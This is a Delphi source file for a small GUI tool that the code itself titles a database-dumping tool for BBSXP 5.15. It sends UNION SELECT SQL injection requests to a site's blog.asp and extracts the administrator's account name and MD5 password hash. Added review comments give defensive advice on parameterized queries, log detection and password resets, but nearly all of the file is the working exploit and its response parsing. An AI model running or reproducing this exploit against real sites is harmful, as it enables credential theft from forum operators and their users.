unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
IdHTTP, StdCtrls, IdAntiFreezeBase, IdAntiFreeze, WinHTTP, ComCtrls,
ExtCtrls, WinSKINData;
type
// Main (and only) form of the tool. The component fields below are the
// form's designer-placed controls; the event handlers are presumably wired
// to them in the form resource, which is not visible here.
TForm1 = class(TForm)
// Base URL of the target site, typed by the user (read in Button1Click).
Edit1: TEdit;
// Receives the account name extracted from the first response.
Edit2: TEdit;
// Receives the 32-character password hash extracted from the second response.
Edit3: TEdit;
Button1: TButton;
// Indy HTTP client used for the first (account name) request.
IdHTTP1: TIdHTTP;
// Second HTTP client used for the password-hash request; its result is
// delivered through the WinHTTP1Done / WinHTTP1HTTPError handlers.
WinHTTP1: TWinHTTP;
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Bevel1: TBevel;
Button2: TButton;
StatusBar1: TStatusBar;
// Builds and sends both requests (see implementation).
procedure Button1Click(Sender: TObject);
// Handles the WinHTTP1 response body on success.
procedure WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
// Handles the WinHTTP1 response body when the server answers with an error.
procedure WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
// Closes the form.
procedure Button2Click(Sender: TObject);
// Resets the window caption when Edit3's text changes.
procedure Edit3Change(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Button1 handler. Takes the base URL from Edit1 and issues two GET requests
// against blog.asp, each with a UNION SELECT appended to the `id` query
// parameter: the first selects [username], the second [userpass], both from
// the [user] table where membercode=5 (the meaning of that value is not
// shown in this file). The first response is parsed here; the second is
// parsed in WinHTTP1Done / WinHTTP1HTTPError.
//
// Review notes (defensive reading of this sample):
// - The request only works if the server builds its SQL by concatenating the
//   `id` value into the query text. Binding `id` as a parameter, or rejecting
//   any non-integer value before the query is built, removes the issue.
// - In web-server access logs these requests show up as blog.asp hits whose
//   `id` value contains "union%20select" and bracketed column names; that
//   pattern is a practical detection signature.
// - The window caption names the affected product as BBSXP 5.15; operators
//   of that software should check for a fixed release from the vendor.
procedure TForm1.Button1Click(Sender: TObject);
var
s1:string;
url1,url2:string;
i:integer;
begin
// Refuse to run with an empty base URL. Message: "Please enter a URL first!"
if edit1.Text ='' then
begin
showmessage(' 请输入网址先!');
exit;
end;
// The base URL is used as typed; no separator or scheme is added or checked.
url1:=edit1.Text+'blog.ASP?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
url2:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
//--------------------------- extract account name (idHTTP) -----------------------
try
// Caption: "Extracting account name......"
Form1.Caption :='正在暴取账号......';
s1:=idHTTP1.Get(url1);
// The literal text 'username' in the returned page is used as the marker
// for where the selected column value was rendered.
if pos('username',s1)<>0 then
begin
i:=pos('username',s1);
// i+9 skips the 8-character marker plus one following character.
s1:=copy(s1,i+9,15); // account length is not fixed, but is at most 12 characters
i:=pos('">',s1);
s1:=copy(s1,1,i-1); // the account name
edit2.Text :=s1;
idHTTP1.Disconnect ; // close the connection
end
else
begin
// Marker not found: restore the idle caption and report
// "Extraction failed! The vulnerability may not be present!"
Form1.Caption :='[BBSXP 5.15]暴库工具 ';
showmessage('暴库失败!可能不存在此漏洞!');
idHTTP1.Disconnect ; // close the connection
exit;
end;
except
// Any exception from the request or parsing ends up here.
// Message: "Network timeout or other error!"
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
showmessage('网络超时或其他错误!');
idHTTP1.Disconnect ;
exit; // on error, leave here and do not run the code below
end;
//---------- account name extraction finished -------------
//---- the author assumes that if the account name was extracted, the password request will succeed too, so execution continues
//----------------------------- extract password (WinHTTP) ------------------------
// Caption: "Extracting password......"
Form1.Caption :='正在暴取密码......';
WinHTTP1.URL :=url2;
WinHTTP1.Read;
//----- continues in WinHTTP1Done and WinHTTP1HTTPError ----------
end;
//------- WinHTTP1Done and WinHTTP1HTTPError must contain the same code, because the password response usually arrives in the Error state ----
// Success handler for WinHTTP1. Copies the response body out of Stream,
// looks for the marker text 'username', and puts the 32 characters that
// start 9 positions after the marker into Edit3.
//
// NOTE(review): the marker is 'username' even though the request selected
// [userpass]; presumably the page renders the selected column at the same
// place in its markup. That cannot be confirmed from this file.
// NOTE(review), defensive: per the author's comment below, the stored value
// is a 32-character MD5 digest. Whether it is salted is not shown here; in
// either case MD5 is not a suitable password hash, and a site that has
// exposed such values should force password resets and move to a slow,
// salted password-hashing scheme.
procedure TForm1.WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
var
s2:string;
i:integer;
begin
// Raises if Stream is not a TMemoryStream. Inside the with-block, `size`
// resolves to the stream's Size.
with Stream as TMemoryStream do
begin
SetLength(s2,size);
// NOTE(review): reads from the stream's current position and indexes s2[1]
// without checking that size is non-zero.
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); // the value is a fixed-length 32-character MD5 hash, so taking 32 characters yields the stored password hash
edit3.Text :=s2;
end;
end;
// Error handler for WinHTTP1. Its body is a copy of the WinHTTP1Done body:
// it reads the response body from Stream, looks for the marker text
// 'username', and puts the 32 characters that start 9 positions after the
// marker into Edit3. ErrorCode is not inspected.
//
// NOTE(review), defensive: the handler relies on the server sending a page
// body together with an error status. Serving a generic error page without
// query-derived content, alongside parameterized queries, limits what such a
// response can disclose.
procedure TForm1.WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
var
s2:string;
i:integer;
begin
// Raises if Stream is not a TMemoryStream. Inside the with-block, `size`
// resolves to the stream's Size.
with Stream as TMemoryStream do
begin
SetLength(s2,size);
// NOTE(review): reads from the stream's current position and indexes s2[1]
// without checking that size is non-zero.
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); // the value is a fixed-length 32-character MD5 hash, so taking 32 characters yields the stored password hash
edit3.Text :=s2;
end;
end;
// Button2 handler: closes the form that owns this handler.
procedure TForm1.Button2Click(Sender: TObject);
begin
  Self.Close;
end;
// Edit3 change handler: once the result field's text changes, put the idle
// title back on the global Form1 instance (replacing the "in progress"
// caption set by Button1Click).
procedure TForm1.Edit3Change(Sender: TObject);
const
  // Idle window title; the trailing space is part of the original text.
  IdleTitle = '[BBSxp 5.15]暴库工具 ';
begin
  Form1.Caption := IdleTitle;
end;
end.